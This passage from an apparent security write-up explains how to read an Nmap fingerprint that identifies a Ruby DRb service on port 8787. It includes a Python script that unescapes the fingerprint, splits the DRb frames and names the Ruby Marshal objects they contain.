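Reading DRb out of that fingerprint by eye works, but it helps to know what you are looking at: Nmap's SF lines are one escaped string split across continuation lines, and DRb frames each reply as a 4-byte big-endian length followed by a Ruby Marshal dump. The probe got two frames back, a Marshal false (request failed) followed by a DRb::DRbConnError object whose backtrace names drb.rb. The Python below, an added example rather than anything from the post, reassembles the fingerprint printed above (pasted verbatim; it is truncated, as Nmap output is), undoes the escaping, splits the DRb frames and names the outermost Marshal value. Only the handful of Marshal types needed for that are decoded.

```python
import re
import struct

# Nmap's fingerprint for 8787/tcp, copied from the scan above. Nmap truncates
# long responses, so the second DRb frame is incomplete and the parser must cope.
SAMPLE_FINGERPRINT = r"""
SF-Port8787-TCP:V=6.25%I=9%D=11/20%Time=528CC14C%P=x86_64-unknown-linux-gn
SF:u%r(GenericLines,3AB,"\0\0\0\x03\x04\x08F\0\0\x03\xa0\x04\x08o:\x16DRb:
SF::DRbConnError\x07:\x07bt\[\x17\"//usr/lib/ruby/1\.8/drb/drb\.rb:573:in\
SF:x20`load'\"7/usr/lib/ruby/1\.8/drb/drb\.rb:612:in\x20`recv_request'\"7/
SF:usr/lib/ruby/1\.8/drb/drb\.rb:911:in\x20`recv_request'\"
"""

_SIMPLE_ESCAPES = {"0": 0, "n": 10, "r": 13, "t": 9}


def unescape_sf(s: str) -> bytes:
    """Undo Nmap's fingerprint escaping: \\xNN, \\0, \\n, \\r, \\t, and a backslash
    before a regex metacharacter (\\. \\[ \\" ...) which stands for the character itself."""
    out = bytearray()
    i = 0
    while i < len(s):
        if s[i] != "\\":
            out.append(ord(s[i]))
            i += 1
            continue
        if i + 1 >= len(s):
            break                                  # dangling backslash at a truncation point
        e = s[i + 1]
        if e == "x":
            if i + 4 > len(s):
                break
            out.append(int(s[i + 2:i + 4], 16))
            i += 4
        elif e in _SIMPLE_ESCAPES:
            out.append(_SIMPLE_ESCAPES[e])
            i += 2
        else:
            out.append(ord(e))
            i += 2
    return bytes(out)


def _scan_quoted(body: str, start: int) -> tuple[str, bool]:
    """Escaped text up to the closing quote, and whether that quote was found."""
    i = start
    while i < len(body):
        if body[i] == "\\":
            i += 2
        elif body[i] == '"':
            return body[start:i], True
        else:
            i += 1
    return body[start:], False


def parse_sf_fingerprint(text: str):
    """Reassemble the SF: continuation lines and pull out every probe response.

    Returns (port, protocol, [(probe_name, declared_length, data, complete), ...]).
    """
    lines = [ln.strip() for ln in text.strip().splitlines()]
    m = re.match(r"SF-Port(\d+)-(TCP|UDP):(.*)", lines[0])
    if not m:
        raise ValueError("not an Nmap service fingerprint")
    body = m.group(3) + "".join(ln[3:] for ln in lines[1:] if ln.startswith("SF:"))
    probes = []
    for pm in re.finditer(r'%r\((\w+),([0-9A-Fa-f]+),"', body):
        raw, complete = _scan_quoted(body, pm.end())
        probes.append((pm.group(1), int(pm.group(2), 16), unescape_sf(raw), complete))
    return int(m.group(1)), m.group(2), probes


def split_drb_messages(data: bytes) -> list[tuple[int, bytes, bool]]:
    """DRb frames every object as a 4-byte big-endian length then a Marshal dump."""
    msgs, off = [], 0
    while off + 4 <= len(data):
        (n,) = struct.unpack(">I", data[off:off + 4])
        payload = data[off + 4:off + 4 + n]
        msgs.append((n, payload, len(payload) == n))
        off += 4 + n
    return msgs


def _read_fixnum(b: bytes, i: int) -> tuple[int, int]:
    """Ruby Marshal packed integer (used here for symbol lengths)."""
    c = b[i] - 256 if b[i] >= 0x80 else b[i]
    i += 1
    if c == 0:
        return 0, i
    if 1 <= c <= 4:
        return int.from_bytes(b[i:i + c], "little"), i + c
    if -4 <= c <= -1:
        return int.from_bytes(b[i:i - c], "little") - (1 << (8 * -c)), i - c
    return (c - 5) if c > 0 else (c + 5), i


def describe_marshal(payload: bytes) -> str:
    """Name the outermost Marshal 4.8 value; enough to recognise DRb's reply objects."""
    if payload[:2] != b"\x04\x08":
        return "not Marshal 4.8"
    t = payload[2:3]
    if t in (b"0", b"T", b"F"):
        return {b"0": "nil", b"T": "true", b"F": "false"}[t]
    if t == b"o" and payload[3:4] == b":":         # object: class name follows as a symbol
        n, i = _read_fixnum(payload, 4)
        return "object " + payload[i:i + n].decode("ascii", "replace")
    return "type " + t.decode("latin-1")


if __name__ == "__main__":
    port, proto, probes = parse_sf_fingerprint(SAMPLE_FINGERPRINT)
    for name, declared, data, complete in probes:
        print(f"{proto}/{port} probe {name}: {declared} bytes declared, complete={complete}")
        for n, payload, whole in split_drb_messages(data):
            print(f"  frame len={n} whole={whole}: {describe_marshal(payload)}")
```

The first frame alone (length 3, Marshal false) is a strong DRb tell even when the error object is cut off, and the same two-frame shape is what you will see from any dRuby service that rejects a malformed request, not just this one.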
